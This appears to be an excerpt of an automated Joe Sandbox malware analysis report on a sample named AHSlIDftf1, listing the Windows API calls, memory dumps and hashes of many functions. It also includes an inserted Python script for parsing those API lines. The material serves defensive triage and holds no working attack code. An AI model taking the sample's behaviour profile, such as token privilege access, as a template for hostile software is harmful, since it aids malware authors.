                                                                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00D73B7C
                                                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 00D73BA4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                            • String ID:
                                                                                                            • API String ID: 737400349-0
                                                                                                            • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                            • Instruction ID: 4de8c1d2a57846c143f4a4f342c5cba1e11ee3c16d3b8ecfcc74f3d3211ae116
                                                                                                            • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                            • Instruction Fuzzy Hash: 6501E932100149BBDF125E95CC46EEB7B69EF58754F048018FE5C56121E732E961EBB1
                                                                                                            APIs
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00D513C6,00000000,00000000,?,00D8301A,00D513C6,00000000,00000000,00000000,?,00D8328B,00000006,FlsSetValue), ref: 00D830A5
                                                                                                            • GetLastError.KERNEL32(?,00D8301A,00D513C6,00000000,00000000,00000000,?,00D8328B,00000006,FlsSetValue,00DF2290,FlsSetValue,00000000,00000364,?,00D82E46), ref: 00D830B1
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D8301A,00D513C6,00000000,00000000,00000000,?,00D8328B,00000006,FlsSetValue,00DF2290,FlsSetValue,00000000), ref: 00D830BF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 3177248105-0
                                                                                                            • Opcode ID: 8200937a8ac89a68b792acf6f353c9e7c672d8dffc70c99a02b1a05491e9ed5f
                                                                                                            • Instruction ID: 937f7dd63dfcd5009a7d0476e0b1c82a9b076347c38b7a21e1efbb6c12192f9d
                                                                                                            • Opcode Fuzzy Hash: 8200937a8ac89a68b792acf6f353c9e7c672d8dffc70c99a02b1a05491e9ed5f
                                                                                                            • Instruction Fuzzy Hash: 4001F732311322ABCB316FB99C849677B98AF05FA1B140720F90DE7280C721DA02C7F0
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00DB747F
                                                                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00DB7497
                                                                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00DB74AC
                                                                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00DB74CA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 1352324309-0
                                                                                                            • Opcode ID: cf4044aa29092dc1969620bc5c88dd70d4b3f0b9375c95ecdc0ca4ea8b58de9c
                                                                                                            • Instruction ID: 0e3b68d5809a47966f09ea3240852f0e9ef3234406871b4bdd86e3ebf4c0b34b
                                                                                                            • Opcode Fuzzy Hash: cf4044aa29092dc1969620bc5c88dd70d4b3f0b9375c95ecdc0ca4ea8b58de9c
                                                                                                            • Instruction Fuzzy Hash: 0211ADB1605314EBE7209F14DC48FD27BFCEB80B01F108569AA6BDA291D7B0E904DB70
                                                                                                            APIs
                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00DBACD3,?,00008000), ref: 00DBB0C4
                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00DBACD3,?,00008000), ref: 00DBB0E9
                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00DBACD3,?,00008000), ref: 00DBB0F3
                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00DBACD3,?,00008000), ref: 00DBB126
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CounterPerformanceQuerySleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 2875609808-0
                                                                                                            • Opcode ID: 31bef189abd30157a83c6ac8578bb11260846c29c432dee4ad7bf2030c524795
                                                                                                            • Instruction ID: cd6d5683261bd3335e42bc9651e27bf1277245bcbaf1623de98672ab0d9702bc
                                                                                                            • Opcode Fuzzy Hash: 31bef189abd30157a83c6ac8578bb11260846c29c432dee4ad7bf2030c524795
                                                                                                            • Instruction Fuzzy Hash: 74113C31D01728E7CF00AFA9D9986EEBB78FF1A761F104086D942B6241CBB095518B71
                                                                                                            APIs
                                                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00DB2DC5
                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DB2DD6
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00DB2DDD
                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00DB2DE4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2710830443-0
                                                                                                            • Opcode ID: 8bd89ab51b581b98d45589cc6e70ed802d8eb4d5bcd0d4e0e8601a93bbed8a19
                                                                                                            • Instruction ID: c1b7465361b7582feb4ec49114edfc521ff631cf8fb90d5e8d2dd9d0aa7caf62
                                                                                                            • Opcode Fuzzy Hash: 8bd89ab51b581b98d45589cc6e70ed802d8eb4d5bcd0d4e0e8601a93bbed8a19
                                                                                                            • Instruction Fuzzy Hash: 89E06D72211324BBDB202B639C4DEFB3E6CEB42BA1F441019B106D51909AA4C842C6F0
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D69639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D69693
                                                                                                              • Part of subcall function 00D69639: SelectObject.GDI32(?,00000000), ref: 00D696A2
                                                                                                              • Part of subcall function 00D69639: BeginPath.GDI32(?), ref: 00D696B9
                                                                                                              • Part of subcall function 00D69639: SelectObject.GDI32(?,00000000), ref: 00D696E2
                                                                                                            • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00DE8887
                                                                                                            • LineTo.GDI32(?,?,?), ref: 00DE8894
                                                                                                            • EndPath.GDI32(?), ref: 00DE88A4
                                                                                                            • StrokePath.GDI32(?), ref: 00DE88B2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                            • String ID:
                                                                                                            • API String ID: 1539411459-0
                                                                                                            • Opcode ID: b88c8b616d09cf2371de65b251f6d2ddff322a21be7edb1ac03a0339e71b552c
                                                                                                            • Instruction ID: 765a8cdac8eed7e68db69660f68a3b79851d7cbbfc7545849a010460a0d23519
                                                                                                            • Opcode Fuzzy Hash: b88c8b616d09cf2371de65b251f6d2ddff322a21be7edb1ac03a0339e71b552c
                                                                                                            • Instruction Fuzzy Hash: 52F09A36001298BADB122F95AC49FCE3B19AF06310F048000FE01A91E1C7741652DBF5
                                                                                                            APIs
                                                                                                            • GetSysColor.USER32(00000008), ref: 00D698CC
                                                                                                            • SetTextColor.GDI32(?,?), ref: 00D698D6
                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00D698E9
                                                                                                            • GetStockObject.GDI32(00000005), ref: 00D698F1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$ModeObjectStockText
                                                                                                            • String ID:
                                                                                                            • API String ID: 4037423528-0
                                                                                                            • Opcode ID: 2a81bd036c6a2ea420a69bb5ff71a098fd381de70b2005b0ea318d4fc6b39452
                                                                                                            • Instruction ID: b626663c4bd2db92a0aae1734321ae093dcbf2187beb10f9f70594f1f03f9578
                                                                                                            • Opcode Fuzzy Hash: 2a81bd036c6a2ea420a69bb5ff71a098fd381de70b2005b0ea318d4fc6b39452
                                                                                                            • Instruction Fuzzy Hash: E0E06D31254780AADB216B78EC49BE83F20EB12336F08921AF6FA981E1C37146419F30
                                                                                                            APIs
                                                                                                            • GetCurrentThread.KERNEL32 ref: 00DB1634
                                                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,00DB11D9), ref: 00DB163B
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00DB11D9), ref: 00DB1648
                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,00DB11D9), ref: 00DB164F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 3974789173-0
                                                                                                            • Opcode ID: 6e979af65a9f6afc4840cdd96980262abb940d75474698fa3cc3a3c71b6befaf
                                                                                                            • Instruction ID: 874eda23c9de78df51abc23be360d661984fdb4d5af42ee0b49be28263891835
                                                                                                            • Opcode Fuzzy Hash: 6e979af65a9f6afc4840cdd96980262abb940d75474698fa3cc3a3c71b6befaf
                                                                                                            • Instruction Fuzzy Hash: A6E08C36612311EBD7302FA4AE4DB8A3B7CAF447A2F188808F646CD080E7348442CB74
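The "APIs" lists in these function records follow one fixed line format (bullet, optional "Part of subcall function <addr>:" prefix, API.MODULE(args), ref: <addr>), with "?" for arguments the plugin could not resolve statically. The following is an added example, not part of the Joe Sandbox report or the plugin: a small parser for that format that decodes a few documented Windows constants where the argument position is unambiguous (GetSysColor, SetBkMode, GetStockObject, GetDeviceCaps) and expands a token access mask. The sample input is constructed from API lines copied from the records on this page; the constant names are the Windows SDK values. Treating the 0x28 shown on the GetCurrentProcess line as the DesiredAccess later passed to OpenProcessToken is an assumption (the report lists stack values, not attributed parameters); 0x28 is TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES, the mask normally requested before AdjustTokenPrivileges.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: API lines in the report's "APIs" list format, copied from
# the function records on this page (ref addresses are the report's own).
SAMPLE = """\
• GetSysColor.USER32(00000008), ref: 00D698CC
• SetTextColor.GDI32(?,?), ref: 00D698D6
• SetBkMode.GDI32(?,00000001), ref: 00D698E9
• GetStockObject.GDI32(00000005), ref: 00D698F1
• GetCurrentThread.KERNEL32 ref: 00DB1634
• OpenThreadToken.ADVAPI32(00000000,?,?,?,00DB11D9), ref: 00DB163B
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00DB11D9), ref: 00DB1648
• OpenProcessToken.ADVAPI32(00000000,?,?,?,00DB11D9), ref: 00DB164F
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DAD882
  • Part of subcall function 00D69639: SelectObject.GDI32(?,00000000), ref: 00D696A2
"""

# One line per call; the parenthesised argument list is absent for
# zero-argument APIs such as GetCurrentThread.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Windows SDK constant names, keyed by (API, zero-based argument index).
CONSTANTS = {
    ("GetSysColor", 0): {0x08: "COLOR_WINDOWTEXT"},
    ("SetBkMode", 1): {0x01: "TRANSPARENT", 0x02: "OPAQUE"},
    ("GetStockObject", 0): {0x05: "NULL_BRUSH"},
    ("GetDeviceCaps", 1): {0x08: "HORZRES", 0x0A: "VERTRES", 0x0C: "BITSPIXEL"},
}

# TOKEN_* access rights (winnt.h), used to expand an OpenProcessToken mask.
TOKEN_ACCESS = {
    0x0001: "TOKEN_ASSIGN_PRIMARY", 0x0002: "TOKEN_DUPLICATE",
    0x0004: "TOKEN_IMPERSONATE", 0x0008: "TOKEN_QUERY",
    0x0010: "TOKEN_QUERY_SOURCE", 0x0020: "TOKEN_ADJUST_PRIVILEGES",
    0x0040: "TOKEN_ADJUST_GROUPS", 0x0080: "TOKEN_ADJUST_DEFAULT",
    0x0100: "TOKEN_ADJUST_SESSIONID",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]            # raw tokens: "?" or 8-digit hex
    ref: int                   # call-site address
    subcall_of: Optional[int]  # address of the callee this line belongs to


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse a block of report API lines; raise on any line that does not fit."""
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised API line: {line!r}")
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             int(m.group("ref"), 16), sub))
    return calls


def decode_args(call: ApiCall) -> List[str]:
    """Render arguments as hex, naming constants where the position is known."""
    out = []
    for i, a in enumerate(call.args):
        if a == "?":
            out.append("?")
            continue
        v = int(a, 16)
        name = CONSTANTS.get((call.api, i), {}).get(v)
        out.append(f"0x{v:X}" + (f" ({name})" if name else ""))
    return out


def token_access_names(mask: int) -> str:
    """Expand a TOKEN_* access mask into its named bits (unknown bits kept as hex)."""
    names = [n for bit, n in sorted(TOKEN_ACCESS.items()) if mask & bit]
    rest = mask & ~sum(TOKEN_ACCESS)
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names)


def modules_used(calls: List[ApiCall]) -> List[str]:
    """Sorted set of DLLs a function record imports from; a quick triage key."""
    return sorted({c.module for c in calls})


if __name__ == "__main__":
    for c in parse_api_lines(SAMPLE):
        print(f"{c.ref:08X} {c.api}.{c.module}({', '.join(decode_args(c))})")
    print("0x28 ->", token_access_names(0x28))
```

Run over a whole report, the parser gives you per-function call lists you can group by module or by API family, which is faster than scrolling the records; the constant table is deliberately small so that nothing is decoded at a position the SDK does not fix.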
                                                                                                            APIs
                                                                                                            • GetDesktopWindow.USER32 ref: 00DAD858
                                                                                                            • GetDC.USER32(00000000), ref: 00DAD862
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DAD882
                                                                                                            • ReleaseDC.USER32(?), ref: 00DAD8A3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2889604237-0
                                                                                                            • Opcode ID: 76a7ad52059c50e30333016b64763ffb75e7c988e5bdcce76917e3e28b7b6319
                                                                                                            • Instruction ID: 389d16244cf487f94e4d4cdb914c14ab0c28bd46d18fbed0775dba227793b623
                                                                                                            • Opcode Fuzzy Hash: 76a7ad52059c50e30333016b64763ffb75e7c988e5bdcce76917e3e28b7b6319
                                                                                                            • Instruction Fuzzy Hash: C0E01AB4810304DFCF41AFA4D84866EBBB2FB48311F10A409F856EB360C7388902EF60
                                                                                                            APIs
                                                                                                            • GetDesktopWindow.USER32 ref: 00DAD86C
                                                                                                            • GetDC.USER32(00000000), ref: 00DAD876
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DAD882
                                                                                                            • ReleaseDC.USER32(?), ref: 00DAD8A3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2889604237-0
                                                                                                            • Opcode ID: 99aec78612df5bda32b45fa7dd61d98b73739fd677c8ea571430e7d8638b8f43
                                                                                                            • Instruction ID: b3b4bc9bdd048245ef60ce30d9ace78d59275659d3361552f83ebf339426e144
                                                                                                            • Opcode Fuzzy Hash: 99aec78612df5bda32b45fa7dd61d98b73739fd677c8ea571430e7d8638b8f43
                                                                                                            • Instruction Fuzzy Hash: F5E01A74C10300DFCF41AFA4D84866EBBB1FB48311B10A408F856EB360C73859029F60
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D57620: _wcslen.LIBCMT ref: 00D57625
                                                                                                            • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00DC4ED4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Connection_wcslen
                                                                                                            • String ID: *$LPT
                                                                                                            • API String ID: 1725874428-3443410124
                                                                                                            • Opcode ID: a408a0ef8a09ba35fbe01357f8dc5e2fa03971f711c2086d2b30597a134a94bc
                                                                                                            • Instruction ID: 17e6c5b61a6a6f6eff1eb69f79304c6eb0bf1c7bf1c3a379438aeb805633a7c1
                                                                                                            • Opcode Fuzzy Hash: a408a0ef8a09ba35fbe01357f8dc5e2fa03971f711c2086d2b30597a134a94bc
                                                                                                            • Instruction Fuzzy Hash: 71914A75A002059FDB14DF58C494EAABBF5AF44304F19809DE84A9B3A2D731ED85CBB0
                                                                                                            APIs
                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 00D7E30D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorHandling__start
                                                                                                            • String ID: pow
                                                                                                            • API String ID: 3213639722-2276729525
                                                                                                            • Opcode ID: 8dd3c76b0e002c1e352db1bd62989f832798a836db5ae7c5173989c47dfac02f
                                                                                                            • Instruction ID: 1e77e1b39492bb96bf9da39e6700ccbfb7a0ffcda414986a604ee03cd74449cb
                                                                                                            • Opcode Fuzzy Hash: 8dd3c76b0e002c1e352db1bd62989f832798a836db5ae7c5173989c47dfac02f
                                                                                                            • Instruction Fuzzy Hash: 10512661A0C202D6CB167714C94137A3BA4EF44741F38C9D8F0D9832A9FB35CC959BB6
                                                                                                            APIs
                                                                                                            • CharUpperBuffW.USER32(00DA569E,00000000,?,00DECC08,?,00000000,00000000), ref: 00DD78DD
                                                                                                              • Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A
                                                                                                            • CharUpperBuffW.USER32(00DA569E,00000000,?,00DECC08,00000000,?,00000000,00000000), ref: 00DD783B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BuffCharUpper$_wcslen
                                                                                                            • String ID: <s
                                                                                                            • API String ID: 3544283678-2940880691
                                                                                                            • Opcode ID: c1bece0cb40eca93e7cba605ac2f2a4bd37a03d3eb18801a5474decb80ee1087
                                                                                                            • Instruction ID: c4c66dc97b03bc7b45efeb32723ce005fdcff47deb77f6d6ff6a59af96cb3672
                                                                                                            • Opcode Fuzzy Hash: c1bece0cb40eca93e7cba605ac2f2a4bd37a03d3eb18801a5474decb80ee1087
                                                                                                            • Instruction Fuzzy Hash: 5E614F32914118AACF04EBA4CCA1DFDB374FF24701B54456AED42A7191FF349A49DBB0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
